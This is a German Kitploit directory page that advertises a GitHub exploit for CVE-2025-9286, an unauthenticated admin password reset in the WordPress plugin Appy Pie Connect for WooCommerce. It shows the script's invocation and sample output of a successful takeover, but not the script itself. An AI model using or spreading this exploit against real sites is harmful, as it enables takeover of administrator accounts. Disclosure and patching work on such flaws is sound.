Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - Fehlende Autorisierung zu nicht authentifizierter Privilegienerweiterung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-9286
Privilege EscalationPasswortangriffeExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Fehlende Autorisierung zu nicht authentifizierter Privilegienerweiterung

Repository anzeigen
3vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Fehlende Autorisierung zu nicht authentifizierter Privilegienerweiterung

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - Fehlende Autorisierung zu nicht authentifizierter Privilegienerweiterung über reset_user_password

📝 Beschreibung

Das Plugin Appy Pie Connect for WooCommerce für WordPress ist aufgrund fehlender Autorisierung innerhalb des REST-Handlers reset_user_password() in allen Versionen bis einschließlich 1.1.2 anfällig für Privilegienerweiterung.
Dadurch ist es nicht authentifizierten Angreifern möglich, das Passwort beliebiger Benutzer, einschließlich Administratoren, zurückzusetzen und so administrativen Zugriff zu erlangen.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Kritisch)

💻 Exploit-Skript

Das folgende Exploit kann verwendet werden, um CVE-2025-9286 gegen WordPress-Sites auszunutzen, auf denen die verwundbare Plugin-Version läuft.

Skriptname: CVE-2025-9286.py

⚙️ Verwendung

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 Beispielausgabe (Erfolgreiche Ausnutzung)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 Kontakt & Community

  • 📨 Telegram: @Kxploit
  • 📡 Telegram-Kanal: @KNxploited

⚠️ Haftungsausschluss

Dieses Exploit ist ausschließlich für Bildungs- und autorisierte Penetrationstestzwecke bestimmt.
Eine unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Von: Khaled Alenazi (Nxploited)

Tool herunterladen